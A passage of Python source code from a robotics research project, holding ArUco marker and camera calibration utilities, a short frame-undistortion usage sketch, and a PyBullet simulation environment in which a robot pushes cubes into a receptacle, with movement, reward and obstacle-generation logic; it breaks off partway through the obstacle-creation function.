################################################################################
# Board and markers
def get_marker_parameters():
params = {}
params['dict_id'] = cv2.aruco.DICT_4X4_50
params['marker_length'] = 0.018 # 18 mm
params['marker_length_pixels'] = 6
params['pixels_per_mm'] = 2 # 2 gives much better marker detections than 1
params['sticker_length_mm'] = {'robots': 25, 'cubes': 28, 'corners': 24}
return params
def get_charuco_board_parameters():
params = get_marker_parameters()
params['squares_x'] = 10
params['squares_y'] = 7
params['square_length'] = 0.024 # 24 mm
square_length_pixels = (params['marker_length_pixels'] / params['marker_length']) * params['square_length']
    assert square_length_pixels - int(square_length_pixels) <= 1e-8
params['square_length_pixels'] = int(square_length_pixels)
return params
def get_paper_parameters(orientation='P'):
width, height, padding = 8.5, 11, 0.5
if orientation == 'L':
width, height = height, width
params = {}
params['mm_per_in'] = 25.4
params['width_mm'] = width * params['mm_per_in']
params['height_mm'] = height * params['mm_per_in']
params['padding_mm'] = padding * params['mm_per_in']
params['ppi'] = 600
return params
def get_marker_ids(marker_type):
if marker_type == 'robots':
return list(range(10))
if marker_type == 'cubes':
return list(range(10, 34))
if marker_type == 'corners_robots':
return list(range(42, 46))
if marker_type == 'corners_cubes':
return list(range(46, 50))
if marker_type == 'corners':
return get_marker_ids('corners_robots') + get_marker_ids('corners_cubes')
    raise Exception(marker_type)
################################################################################
# Camera
def get_video_cap(frame_width, frame_height, camera_id=0):
cap = cv2.VideoCapture(camera_id)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, frame_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, frame_height)
cap.set(cv2.CAP_PROP_AUTOFOCUS, 0) # Might not actually do anything on macOS
cap.set(cv2.CAP_PROP_BUFFERSIZE, 1) # Reduces latency
assert cap.get(cv2.CAP_PROP_FRAME_WIDTH) == frame_width, (cap.get(cv2.CAP_PROP_FRAME_WIDTH), frame_width)
assert cap.get(cv2.CAP_PROP_FRAME_HEIGHT) == frame_height, (cap.get(cv2.CAP_PROP_FRAME_HEIGHT), frame_height)
return cap
def get_usb_device_serial(camera_name):
if camera_name == 'logitech-c930e':
id_vendor, id_product = (0x046d, 0x0843)
else:
        raise Exception(camera_name)
dev = usb.core.find(idVendor=id_vendor, idProduct=id_product)
return usb.util.get_string(dev, dev.iSerialNumber)
def get_camera_identifier(camera_name):
try:
return get_usb_device_serial(camera_name)
    except Exception:
return 'unknown-camera'
def get_camera_params_file_path(camera_name='logitech-c930e'):
camera_params_dir = Path('camera-params')
identifier = get_camera_identifier(camera_name)
return str(camera_params_dir / '{}.yml'.format(identifier))
def get_camera_params(camera_params_file_path):
assert Path(camera_params_file_path).exists()
fs = cv2.FileStorage(camera_params_file_path, cv2.FILE_STORAGE_READ)
image_width = fs.getNode('image_width').real()
image_height = fs.getNode('image_height').real()
camera_matrix = fs.getNode('camera_matrix').mat()
dist_coeffs = fs.getNode('distortion_coefficients').mat()
fs.release()
return image_width, image_height, camera_matrix, dist_coeffs
```
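Not part of the file above, but for orientation: a minimal sketch of how these helpers might be combined to read undistorted frames. It assumes a calibration file already exists at the path returned by `get_camera_params_file_path()` (i.e. `camera-params/<serial>.yml`, produced by a separate calibration step), that the script is run from the `aruco/` directory so `utils` is importable, and the display loop with 'q'-to-quit is purely illustrative.
```python
# Sketch: capture frames with the calibrated camera and undistort them.
import cv2

import utils  # the aruco/utils.py module above

camera_params_path = utils.get_camera_params_file_path()
image_width, image_height, camera_matrix, dist_coeffs = utils.get_camera_params(camera_params_path)
cap = utils.get_video_cap(int(image_width), int(image_height))
while True:
    ret, frame = cap.read()
    if not ret:
        break
    undistorted = cv2.undistort(frame, camera_matrix, dist_coeffs)
    cv2.imshow('undistorted', undistorted)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()
```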
#### File: jimmyyhwu/spatial-action-maps/environment.py
```python
import pprint
import tempfile
from pathlib import Path
import numpy as np
import pybullet as p
from scipy.ndimage import rotate as rotate_image
from scipy.ndimage import distance_transform_edt
from shapely.geometry import box
from shapely.ops import unary_union
from skimage.draw import line
from skimage.measure import approximate_polygon
from skimage.morphology import binary_dilation
from skimage.morphology import disk  # skimage.morphology.selem was removed in newer scikit-image
import spfa
# Room, walls, and objects
GLOBAL_SCALING = 0.1
ROBOT_HALF_WIDTH = 0.03
ROBOT_RADIUS = (ROBOT_HALF_WIDTH**2 + 0.0565**2)**0.5
ROBOT_HEIGHT = 0.07
CUBE_WIDTH = 0.044
CUBE_MASS = 0.01
CUBE_COLOR = (237.0 / 255, 201.0 / 255, 72.0 / 255, 1)
WALL_HEIGHT = 0.1
WALL_THICKNESS = 1.4
RECEPTACLE_WIDTH = 0.15
RECEPTACLE_COLOR = (1, 87.0 / 255, 89.0 / 255, 1)
ROUNDED_CORNER_WIDTH = 0.1006834873
OBSTACLE_COLOR = (0.9, 0.9, 0.9, 1)
DEBUG_LINE_COLOR = (78.0 / 255, 121.0 / 255, 167.0 / 255)
# Movement
MOVE_STEP_SIZE = 0.005 # 5 mm
TURN_STEP_SIZE = np.radians(15) # 15 degrees
MOVEMENT_MAX_FORCE = 10
NOT_MOVING_THRESHOLD = 0.0005 # 0.5 mm
NOT_TURNING_THRESHOLD = np.radians(1) # 1 degree
NONMOVEMENT_DIST_THRESHOLD = 0.005
NONMOVEMENT_TURN_THRESHOLD = np.radians(1)
STEP_LIMIT = 800
# Camera
CAMERA_HEIGHT = ROBOT_HEIGHT
CAMERA_PITCH = -30
CAMERA_FOV = 60
CAMERA_NEAR = 0.01
CAMERA_FAR = 10
FLOOR_SEG_INDEX = 1
OBSTACLE_SEG_INDEX = 2
RECEPTACLE_SEG_INDEX = 3
CUBE_SEG_INDEX = 4
ROBOT_SEG_INDEX = 5
MAX_SEG_INDEX = 8
# Overhead map
LOCAL_MAP_PIXEL_WIDTH = 96
LOCAL_MAP_WIDTH = 1 # 1 meter
LOCAL_MAP_PIXELS_PER_METER = LOCAL_MAP_PIXEL_WIDTH / LOCAL_MAP_WIDTH
MAP_UPDATE_STEPS = 250
class Environment:
def __init__(
# pylint: disable=bad-continuation
# This comment is here to make code folding work
self, room_length=1.0, room_width=0.5, num_cubes=10, obstacle_config='small_empty',
use_distance_to_receptacle_channel=True, distance_to_receptacle_channel_scale=0.25,
use_shortest_path_to_receptacle_channel=False, use_shortest_path_channel=False, shortest_path_channel_scale=0.25,
use_position_channel=False, position_channel_scale=0.25,
partial_rewards_scale=2.0, use_shortest_path_partial_rewards=False, collision_penalty=0.25, nonmovement_penalty=0.25,
use_shortest_path_movement=False, fixed_step_size=None, use_steering_commands=False, steering_commands_num_turns=4,
ministep_size=0.25, inactivity_cutoff=100, random_seed=None,
use_gui=False, show_debug_annotations=False, show_occupancy_map=False,
):
################################################################################
# Store arguments
# Room config
self.room_length = room_length
self.room_width = room_width
self.num_cubes = num_cubes
self.obstacle_config = obstacle_config
# State representation
self.use_distance_to_receptacle_channel = use_distance_to_receptacle_channel
self.distance_to_receptacle_channel_scale = distance_to_receptacle_channel_scale
self.use_shortest_path_to_receptacle_channel = use_shortest_path_to_receptacle_channel
self.use_shortest_path_channel = use_shortest_path_channel
self.shortest_path_channel_scale = shortest_path_channel_scale
self.use_position_channel = use_position_channel
self.position_channel_scale = position_channel_scale
# Rewards
self.partial_rewards_scale = partial_rewards_scale
self.use_shortest_path_partial_rewards = use_shortest_path_partial_rewards
self.collision_penalty = collision_penalty
self.nonmovement_penalty = nonmovement_penalty
# Movement
self.use_shortest_path_movement = use_shortest_path_movement
self.fixed_step_size = fixed_step_size
self.use_steering_commands = use_steering_commands
self.steering_commands_num_turns = steering_commands_num_turns
# Misc
self.ministep_size = ministep_size
self.inactivity_cutoff = inactivity_cutoff
self.random_seed = random_seed
self.use_gui = use_gui
self.show_debug_annotations = show_debug_annotations
self.show_occupancy_map = show_occupancy_map
pprint.PrettyPrinter(indent=4).pprint(self.__dict__)
################################################################################
# Room and objects
assert self.num_cubes > 0
assert self.room_length >= self.room_width
# Random placement of robots, cubes, and obstacles
self.random_state = np.random.RandomState(self.random_seed)
# Trash receptacle
self.receptacle_position = [self.room_length / 2 - RECEPTACLE_WIDTH / 2, self.room_width / 2 - RECEPTACLE_WIDTH / 2, 0]
self.receptacle_id = None
# Obstacles
self.obstacle_ids = None
self.min_obstacle_id = None
self.max_obstacle_id = None
# Robot
self.robot_id = None
self.robot_cid = None
self.robot_position = None
self.robot_heading = None
self.robot_cumulative_cubes = None
self.robot_cumulative_distance = None
self.robot_cumulative_reward = None
# Cubes
self.cube_ids = None
self.min_cube_id = None
self.max_cube_id = None
self.available_cube_ids_set = None
self.removed_cube_ids_set = None
# Used to determine whether to end episode
self.inactivity_counter = None
################################################################################
# State representation
# Forward-facing camera
self.camera_image_pixel_height = int(1.63 * LOCAL_MAP_PIXEL_WIDTH)
self.camera_aspect = 16 / 9
self.camera_image_pixel_width = int(self.camera_aspect * self.camera_image_pixel_height)
self.projection_matrix = p.computeProjectionMatrixFOV(CAMERA_FOV, self.camera_aspect, CAMERA_NEAR, CAMERA_FAR)
# Robot state
robot_pixel_width = int(2 * ROBOT_RADIUS * LOCAL_MAP_PIXELS_PER_METER)
self.robot_state_channel = np.zeros((LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH), dtype=np.float32)
start = int(np.floor(LOCAL_MAP_PIXEL_WIDTH / 2 - robot_pixel_width / 2))
for i in range(start, start + robot_pixel_width):
for j in range(start, start + robot_pixel_width):
# Circular robot mask
if (((i + 0.5) - LOCAL_MAP_PIXEL_WIDTH / 2)**2 + ((j + 0.5) - LOCAL_MAP_PIXEL_WIDTH / 2)**2)**0.5 < robot_pixel_width / 2:
self.robot_state_channel[i, j] = 1
# Distance channel can be precomputed
if self.use_distance_to_receptacle_channel:
self.global_distance_to_receptacle_map = self._create_global_distance_to_receptacle_map()
# Used to mask out the wall pixels when updating occupancy map
room_mask = self._create_padded_room_zeros()
room_width_pixels = int(2 * np.ceil(((self.room_width - 2 * ROBOT_HALF_WIDTH) * LOCAL_MAP_PIXELS_PER_METER) / 2))
room_length_pixels = int(2 * np.ceil(((self.room_length - 2 * ROBOT_HALF_WIDTH) * LOCAL_MAP_PIXELS_PER_METER) / 2))
start_i, start_j = int(room_mask.shape[0] / 2 - room_width_pixels / 2), int(room_mask.shape[1] / 2 - room_length_pixels / 2)
room_mask[start_i:start_i + room_width_pixels, start_j:start_j + room_length_pixels] = 1
self.wall_map = 1 - room_mask
self.global_overhead_map = None
self.configuration_space = None
self.configuration_space_thin = None
self.closest_cspace_indices = None
self.occupancy_map = None
if self.show_occupancy_map:
import matplotlib.pyplot as plt # pylint: disable=import-outside-toplevel
self.plt = plt
self.plt.figure(figsize=(4, 4 * self.room_width / self.room_length))
self.plt.ion()
self.free_space_map = None
# Position channel can be precomputed
if self.use_position_channel:
self.local_position_map_x, self.local_position_map_y = self._create_local_position_map()
################################################################################
# pybullet
if self.use_gui:
p.connect(p.GUI)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0)
else:
p.connect(p.DIRECT)
p.resetDebugVisualizerCamera(
0.47 + (5.25 - 0.47) / (10 - 0.7) * (self.room_length - 0.7), 0, -70,
(0, -(0.07 + (1.5 - 0.07) / (10 - 0.7) * (self.room_width - 0.7)), 0)
)
self.assets_dir = Path(__file__).parent / 'assets'
################################################################################
# Misc
if self.use_steering_commands:
increment = 360 / self.steering_commands_num_turns
self.simple_action_space_turn_angles = [np.radians(i * increment) for i in range(self.steering_commands_num_turns)]
def reset(self):
################################################################################
# Room and objects
# Reset pybullet
p.resetSimulation()
p.setRealTimeSimulation(0)
p.setGravity(0, 0, -9.8)
# Create the environment
self._create_environment()
self._reset_poses()
self._step_simulation_until_still()
################################################################################
# State representation
self.global_overhead_map = self._create_padded_room_zeros()
self.occupancy_map = self._create_padded_room_zeros()
if self.show_occupancy_map:
self.free_space_map = self._create_padded_room_zeros()
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization()
################################################################################
# Variables
# Sets to track cubes
self.available_cube_ids_set = set(self.cube_ids) # Cubes that have not been removed
self.removed_cube_ids_set = set()
# Counters
self.inactivity_counter = 0
self.robot_cumulative_cubes = 0
self.robot_cumulative_distance = 0
self.robot_cumulative_reward = 0
################################################################################
return self.get_state()
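    # Execute one high-level action (a flat index into the local action map) and return (state, reward, done, info)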
def step(self, action):
return self._step(action)
def _step(self, action, dry_run=False):
################################################################################
# Setup
# Store new action
if self.use_steering_commands:
robot_action = action
else:
robot_action = np.unravel_index(action, (LOCAL_MAP_PIXEL_WIDTH, LOCAL_MAP_PIXEL_WIDTH))
robot_cubes = 0
robot_reward = 0
robot_hit_obstacle = False
# Initial pose
robot_initial_position, robot_initial_heading = self._get_robot_pose()
# Compute target end effector position
if self.use_steering_commands:
straight_line_dist = self.fixed_step_size + ROBOT_RADIUS
turn_angle = np.radians(90) - self.simple_action_space_turn_angles[robot_action]
else:
# Compute distance from front of robot (not robot center), which is used to find the
# robot position and heading needed in order to place end effector over specified location.
x_movement = -LOCAL_MAP_WIDTH / 2 + float(robot_action[1]) / LOCAL_MAP_PIXELS_PER_METER
y_movement = LOCAL_MAP_WIDTH / 2 - float(robot_action[0]) / LOCAL_MAP_PIXELS_PER_METER
if self.fixed_step_size is not None:
straight_line_dist = self.fixed_step_size + ROBOT_RADIUS
else:
straight_line_dist = np.sqrt(x_movement**2 + y_movement**2)
turn_angle = np.arctan2(-x_movement, y_movement)
straight_line_heading = restrict_heading_range(robot_initial_heading + turn_angle)
robot_target_end_effector_position = [
robot_initial_position[0] + straight_line_dist * np.cos(straight_line_heading),
robot_initial_position[1] + straight_line_dist * np.sin(straight_line_heading),
0
]
# Do not allow going outside the room
diff = np.asarray(robot_target_end_effector_position) - np.asarray(robot_initial_position)
ratio_x, ratio_y = (1, 1)
bound_x = np.sign(robot_target_end_effector_position[0]) * self.room_length / 2
bound_y = np.sign(robot_target_end_effector_position[1]) * self.room_width / 2
if abs(robot_target_end_effector_position[0]) > abs(bound_x):
ratio_x = (bound_x - robot_initial_position[0]) / (robot_target_end_effector_position[0] - robot_initial_position[0])
if abs(robot_target_end_effector_position[1]) > abs(bound_y):
ratio_y = (bound_y - robot_initial_position[1]) / (robot_target_end_effector_position[1] - robot_initial_position[1])
ratio = min(ratio_x, ratio_y)
robot_target_end_effector_position = (np.asarray(robot_initial_position) + ratio * diff).tolist()
if dry_run:
# Used in real environment
return robot_target_end_effector_position
# Compute waypoint positions
if self.use_shortest_path_movement:
robot_waypoint_positions = self._shortest_path(robot_initial_position, robot_target_end_effector_position, check_straight=True)
else:
robot_waypoint_positions = [robot_initial_position, robot_target_end_effector_position]
# Compute waypoint headings
robot_waypoint_headings = [None]
for i in range(1, len(robot_waypoint_positions)):
x_diff = robot_waypoint_positions[i][0] - robot_waypoint_positions[i - 1][0]
y_diff = robot_waypoint_positions[i][1] - robot_waypoint_positions[i - 1][1]
waypoint_heading = restrict_heading_range(np.arctan2(y_diff, x_diff))
robot_waypoint_headings.append(waypoint_heading)
# Compute movement from final waypoint to the target and apply ROBOT_RADIUS offset to the final waypoint
dist_to_target_end_effector_position = distance(robot_waypoint_positions[-2], robot_waypoint_positions[-1])
signed_dist = dist_to_target_end_effector_position - ROBOT_RADIUS
robot_move_sign = np.sign(signed_dist) # Whether to move backwards to get to final position
robot_target_heading = robot_waypoint_headings[-1]
robot_target_position = [
robot_waypoint_positions[-2][0] + signed_dist * np.cos(robot_target_heading),
robot_waypoint_positions[-2][1] + signed_dist * np.sin(robot_target_heading),
0
]
robot_waypoint_positions[-1] = robot_target_position
# Avoid awkward backing up to reach the last waypoint
if len(robot_waypoint_positions) > 2 and signed_dist < 0:
robot_waypoint_positions[-2] = robot_waypoint_positions[-1]
x_diff = robot_waypoint_positions[-2][0] - robot_waypoint_positions[-3][0]
y_diff = robot_waypoint_positions[-2][1] - robot_waypoint_positions[-3][1]
waypoint_heading = restrict_heading_range(np.arctan2(y_diff, x_diff))
robot_waypoint_headings[-2] = waypoint_heading
robot_move_sign = 1
# Store the initial configuration space at the start of the step (for partial reward calculation)
initial_configuration_space = self.configuration_space.copy()
# Store initial cube distances for partial reward calculation
initial_cube_distances = {}
cube_ids_to_track = list(self.cube_ids)
for cube_id in cube_ids_to_track:
cube_position, _ = p.getBasePositionAndOrientation(cube_id)
if self.use_shortest_path_partial_rewards:
dist = self._shortest_path_distance(cube_position, self.receptacle_position)
else:
dist = distance(cube_position, self.receptacle_position)
initial_cube_distances[cube_id] = dist
################################################################################
# Movement
self.robot_position = robot_initial_position.copy()
self.robot_heading = robot_initial_heading
robot_is_moving = True
robot_distance = 0
robot_waypoint_index = 1
robot_prev_waypoint_position = robot_waypoint_positions[robot_waypoint_index - 1]
robot_waypoint_position = robot_waypoint_positions[robot_waypoint_index]
robot_waypoint_heading = robot_waypoint_headings[robot_waypoint_index]
sim_steps = 0
while True:
if not robot_is_moving:
break
# Store pose to determine distance moved during simulation step
robot_prev_position = self.robot_position.copy()
robot_prev_heading = self.robot_heading
# Compute robot pose for new constraint
robot_new_position = self.robot_position.copy()
robot_new_heading = self.robot_heading
heading_diff = heading_difference(self.robot_heading, robot_waypoint_heading)
if np.abs(heading_diff) > TURN_STEP_SIZE:
# Turn towards next waypoint first
robot_new_heading += np.sign(heading_diff) * TURN_STEP_SIZE
else:
dx = robot_waypoint_position[0] - self.robot_position[0]
dy = robot_waypoint_position[1] - self.robot_position[1]
if distance(self.robot_position, robot_waypoint_position) < MOVE_STEP_SIZE:
robot_new_position = robot_waypoint_position
else:
if robot_waypoint_index == len(robot_waypoint_positions) - 1:
move_sign = robot_move_sign
else:
move_sign = 1
robot_new_heading = np.arctan2(move_sign * dy, move_sign * dx)
robot_new_position[0] += move_sign * MOVE_STEP_SIZE * np.cos(robot_new_heading)
robot_new_position[1] += move_sign * MOVE_STEP_SIZE * np.sin(robot_new_heading)
# Set new constraint to move the robot to new pose
p.changeConstraint(self.robot_cid, jointChildPivot=robot_new_position, jointChildFrameOrientation=p.getQuaternionFromEuler([0, 0, robot_new_heading]), maxForce=MOVEMENT_MAX_FORCE)
p.stepSimulation()
# Get new robot pose
self.robot_position, self.robot_heading = self._get_robot_pose()
self.robot_position[2] = 0
# Stop moving if robot collided with obstacle
if distance(robot_prev_waypoint_position, self.robot_position) > MOVE_STEP_SIZE:
contact_points = p.getContactPoints(self.robot_id)
if len(contact_points) > 0:
for contact_point in contact_points:
if contact_point[2] in self.obstacle_ids + [self.robot_id]:
robot_is_moving = False
robot_hit_obstacle = True
                            break # Note: robot_distance does not get updated
# Robot no longer turning or moving
if (distance(self.robot_position, robot_prev_position) < NOT_MOVING_THRESHOLD
and np.abs(self.robot_heading - robot_prev_heading) < NOT_TURNING_THRESHOLD):
# Update distance moved
robot_distance += distance(robot_prev_waypoint_position, self.robot_position)
if self.show_debug_annotations:
p.addUserDebugLine(robot_prev_waypoint_position[:2] + [0.001], self.robot_position[:2] + [0.001], DEBUG_LINE_COLOR)
# Increment waypoint index, or stop moving if done
if robot_waypoint_index == len(robot_waypoint_positions) - 1:
robot_is_moving = False
else:
robot_waypoint_index += 1
robot_prev_waypoint_position = robot_waypoint_positions[robot_waypoint_index - 1]
robot_waypoint_position = robot_waypoint_positions[robot_waypoint_index]
robot_waypoint_heading = robot_waypoint_headings[robot_waypoint_index]
# Break if robot is stuck
sim_steps += 1
if sim_steps > STEP_LIMIT:
                break # Note: robot_distance does not get updated
if sim_steps % MAP_UPDATE_STEPS == 0:
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization(robot_waypoint_positions, robot_target_end_effector_position)
# Step the simulation until everything is still
self._step_simulation_until_still()
################################################################################
# Process cubes
# Store final cube positions and remove cubes that are above the wall
to_remove = []
final_cube_positions = {}
for cube_id in self.available_cube_ids_set:
cube_position, _ = p.getBasePositionAndOrientation(cube_id)
final_cube_positions[cube_id] = cube_position
if cube_position[2] > WALL_HEIGHT + 0.49 * CUBE_WIDTH or cube_position[2] < CUBE_WIDTH / 4:
self._remove_cube(cube_id, out_of_bounds=True)
to_remove.append(cube_id)
for cube_id in to_remove:
self.available_cube_ids_set.remove(cube_id)
# Give partial rewards
for cube_id in self.available_cube_ids_set:
cube_position = final_cube_positions[cube_id]
if self.use_shortest_path_partial_rewards:
dist = self._shortest_path_distance(cube_position, self.receptacle_position, configuration_space=initial_configuration_space)
else:
dist = distance(cube_position, self.receptacle_position)
dist_moved = initial_cube_distances[cube_id] - dist
robot_reward += self.partial_rewards_scale * dist_moved
# Give rewards for cubes in receptacle (and remove the cubes)
to_remove = []
for cube_id in self.available_cube_ids_set:
cube_position = final_cube_positions[cube_id]
if self._cube_position_in_receptacle(cube_position):
to_remove.append(cube_id)
self._remove_cube(cube_id)
robot_cubes += 1
robot_reward += 1
for cube_id in to_remove:
self.available_cube_ids_set.remove(cube_id)
################################################################################
# Update state representation
self.robot_position, self.robot_heading = self._get_robot_pose()
self._update_state()
if self.show_occupancy_map:
self._update_occupancy_map_visualization(robot_waypoint_positions, robot_target_end_effector_position)
################################################################################
# Compute stats
# Get final pose
self.robot_position, self.robot_heading = self._get_robot_pose()
# Add distance traveled to cumulative distance
self.robot_cumulative_distance += robot_distance
# Calculate amount turned to check if robot turned this step
robot_turn_angle = heading_difference(robot_initial_heading, self.robot_heading)
# Increment inactivity counter, which measures steps elapsed since the previous cube was stashed
if robot_cubes == 0:
self.inactivity_counter += 1
# Determine whether episode is done
done = False
if len(self.removed_cube_ids_set) == self.num_cubes or self.inactivity_counter >= self.inactivity_cutoff:
done = True
# Compute reward for the step
if robot_hit_obstacle:
robot_reward -= self.collision_penalty
if robot_distance < NONMOVEMENT_DIST_THRESHOLD and abs(robot_turn_angle) < NONMOVEMENT_TURN_THRESHOLD:
robot_reward -= self.nonmovement_penalty
self.robot_cumulative_cubes += robot_cubes
self.robot_cumulative_reward += robot_reward
# Compute items to return
state = self.get_state(done=done)
reward = robot_reward
ministeps = robot_distance / self.ministep_size
info = {
'ministeps': ministeps,
'inactivity': self.inactivity_counter,
'cumulative_cubes': self.robot_cumulative_cubes,
'cumulative_distance': self.robot_cumulative_distance,
'cumulative_reward': self.robot_cumulative_reward,
}
return state, reward, done, info
@staticmethod
def close():
p.disconnect()
@staticmethod
def get_state_width():
return LOCAL_MAP_PIXEL_WIDTH
def get_action_space(self):
if self.use_steering_commands:
return self.steering_commands_num_turns
return LOCAL_MAP_PIXEL_WIDTH * LOCAL_MAP_PIXEL_WIDTH
def get_camera_image(self, image_width=1024, image_height=768):
renderer = p.ER_BULLET_HARDWARE_OPENGL if self.use_gui else p.ER_TINY_RENDERER
_, _, rgb, _, _ = p.getCameraImage(image_width, image_height, flags=p.ER_NO_SEGMENTATION_MASK, renderer=renderer)
return rgb
@staticmethod
def start_video_logging(video_path):
return p.startStateLogging(p.STATE_LOGGING_VIDEO_MP4, video_path)
@staticmethod
def stop_video_logging(log_id):
p.stopStateLogging(log_id)
def _create_environment(self):
# Create floor
with tempfile.TemporaryDirectory() as tmp_dir_name:
# Create custom obj and urdf for current room size
room_length_with_walls = self.room_length + 2 * WALL_THICKNESS
room_width_with_walls = self.room_width + 2 * WALL_THICKNESS
plane_obj_path = str(Path(tmp_dir_name) / 'plane.obj')
with open(self.assets_dir / 'plane.obj.template') as f1:
with open(plane_obj_path, 'w') as f2:
f2.write(f1.read().replace('HALFLENGTH', str(room_length_with_walls / GLOBAL_SCALING / 2)).replace('HALFWIDTH', str(room_width_with_walls / GLOBAL_SCALING / 2)))
plane_urdf_path = str(Path(tmp_dir_name) / 'plane.urdf')
with open(self.assets_dir / 'plane.urdf.template') as f1:
with open(plane_urdf_path, 'w') as f2:
f2.write(f1.read().replace('LENGTH', str(room_length_with_walls / GLOBAL_SCALING)).replace('WIDTH', str(room_width_with_walls / GLOBAL_SCALING)))
p.loadURDF(plane_urdf_path, globalScaling=GLOBAL_SCALING)
# Create obstacles (including walls)
self.obstacle_ids = self._create_obstacles()
self.min_obstacle_id = min(self.obstacle_ids)
self.max_obstacle_id = max(self.obstacle_ids)
# Create trash receptacle
receptacle_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=[0, 0, 0])
receptacle_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=[RECEPTACLE_WIDTH / 2, RECEPTACLE_WIDTH / 2, 0], rgbaColor=RECEPTACLE_COLOR, visualFramePosition=[0, 0, 0.0001])
self.receptacle_id = p.createMultiBody(0.01, receptacle_collision_shape_id, receptacle_visual_shape_id, self.receptacle_position)
# Create cubes
cube_collision_shape_id = p.createCollisionShape(p.GEOM_BOX, halfExtents=(3 * [CUBE_WIDTH / 2]))
cube_visual_shape_id = p.createVisualShape(p.GEOM_BOX, halfExtents=(3 * [CUBE_WIDTH / 2]), rgbaColor=CUBE_COLOR)
self.cube_ids = []
for _ in range(self.num_cubes):
self.cube_ids.append(p.createMultiBody(CUBE_MASS, cube_collision_shape_id, cube_visual_shape_id))
self.min_cube_id = min(self.cube_ids)
self.max_cube_id = max(self.cube_ids)
        # Create robot and initialize constraint
self.robot_id = p.loadURDF(str(self.assets_dir / 'robot.urdf'))
self.robot_cid = p.createConstraint(self.robot_id, -1, -1, -1, p.JOINT_FIXED, [0, 0, 0], [0, 0, 0], [0, 0, 0])
def _create_obstacles(self):
obstacles = []
# Create walls
for x, y, length, width in [
(-self.room_length / 2 - WALL_THICKNESS / 2, 0, WALL_THICKNESS, self.room_width),
(self.room_length / 2 + WALL_THICKNESS / 2, 0, WALL_THICKNESS, self.room_width),
(0, -self.room_width / 2 - WALL_THICKNESS / 2, self.room_length + 2 * WALL_THICKNESS, WALL_THICKNESS),
(0, self.room_width / 2 + WALL_THICKNESS / 2, self.room_length + 2 * WALL_THICKNESS, WALL_THICKNESS)
]:
obstacles.append({'type': 'wall', 'position': (x, y), 'heading': 0, 'length': length, 'width': width})
def get_obstacle_box(obstacle, buffer_width=0.08):
x, y = obstacle['position']
length, width = obstacle['length'], obstacle['width']
b = box(x - length / 2, y - width / 2, x + length / 2, y + width / 2)
if buffer_width > 0:
b = b.buffer(buffer_width)
return b
def get_receptacle_box():
obstacle = {'position': self.receptacle_position[:2], 'heading': 0, 'length': RECEPTACLE_WIDTH, 'width': RECEPTACLE_WIDTH}
return get_obstacle_box(obstacle, buffer_width=0)
def add_random_columns(obstacles, max_num_columns):
num_columns = self.random_state.randint(max_num_columns) + 1
column_length = 0.1
column_width = 0.1
buffer_width = 0.08
polygons = [get_receptacle_box()] + [get_obstacle_box(obstacle) for obstacle in obstacles]
for _ in range(10):
new_obstacles = []
new_polygons = []
polygon_union = unary_union(polygons)
for _ in range(num_columns):
for _ in range(100):
x = self.random_state.uniform(
-self.room_length / 2 + 2 * buffer_width + column_length / 2,
self.room_length / 2 - 2 * buffer_width - column_length / 2
)
y = self.random_state.uniform(
-self.room_width / 2 + 2 * buffer_width + column_width / 2,
self.room_width / 2 - 2 * buffer_width - column_width / 2
)
obstacle = {'type': 'column', 'position': (x, y), 'heading': 0, 'length': column_length, 'width': column_width}
b = get_obstacle_box(obstacle)
if not polygon_union.intersects(b):
new_obstacles.append(obstacle)
new_polygons.append(b)
polygon_union = unary_union(polygons + new_polygons)
break
if len(new_obstacles) == num_columns:
break
return new_obstacles
def add_random_horiz_divider():
divider_length = 0.8
divider_width = 0.05
buffer_width = (2 + np.sqrt(2)) * ROUNDED_CORNER_WIDTH
polygons = unary_union([get_receptacle_box()])
for _ in range(10):
new_obstacles = []
for _ in range(100):
x = self.room_length / 2 - divider_length / 2
y = self.random_state.uniform(
-self.room_width / 2 + buffer_width + divider_width / 2,
self.room_width / 2 - buffer_width - divider_width / 2
)
obstacle = {'type': 'divider', 'position': [x, y], 'heading': 0, 'length': divider_length, 'width': divider_width}
b_no_inflate = get_obstacle_box(obstacle, buffer_width=0)
if not polygons.intersects(b_no_inflate):
new_obstacles.append(obstacle)
break
if len(new_obstacles) == 1:
break
return new_obstacles
# Create obstacles
if self.obstacle_config == 'small_empty':
pass
elif self.obstacle_config == 'small_columns':
obstacles.extend(add_random_columns(obstacles, 3))
elif self.obstacle_config == 'large_columns':
obstacles.extend(add_random_columns(obstacles, 8))
elif self.obstacle_config == 'large_divider':
obstacles.extend(add_random_horiz_divider())
else:
raise Exception(self.obstacle_config)
# Create room corners
for i, (x, y) in enumerate([
(-self.room_length / 2, self.room_width / 2),
(self.room_length / 2, self.room_width / 2),
(self.room_length / 2, -self.room_width / 2),
(-self.room_length / 2, -self.room_width / 2)
]):
if i == 1: # Skip the receptacle corner
continue
heading = -np.radians(i * 90)
offset = ROUNDED_CORNER_WIDTH / np.sqrt(2)
adjusted_position = (x + offset * np.cos(heading - np.radians(45)), y + offset * np.sin(heading - np.radians(45)))
obstacles.append({'type': 'corner', 'position': adjusted_position, 'heading': heading})
# Create additional corners for the divider
new_obstacles = []
for obstacle in obstacles:
if obstacle['type'] == 'divider':
(x, y), length, width = obstacle['position'], obstacle['length'], obstacle['width']
corner_positions = [(self.room_length / 2, y - width / 2), (self.room_length / 2, y + width / 2)]
corner_headings = [-90, 180]
for position, heading in zip(corner_positions, corner_headings):
heading = np.radians(heading)
offset = ROUNDED_CORNER_WIDTH / np.sqrt(2)
adjusted_position = (position[0] + offset * np.cos(heading - np.radians(45)), position[1] + offset * np.sin(heading - np.radians(45)))
                    new_obstacles.append({'type': 'corner', 'position': adjusted_position, 'heading': heading})
obstacles.extend(new_obstacles)
# Add obstacles to pybullet
obstacle_ids = []
for obstacle in obstacles:
if obstacle['type'] == 'corner':
obstacle_collision_shape_id = p.createCollisionShape(p.GEOM_MESH, fileName=str(self.assets_dir / 'corner.obj'))
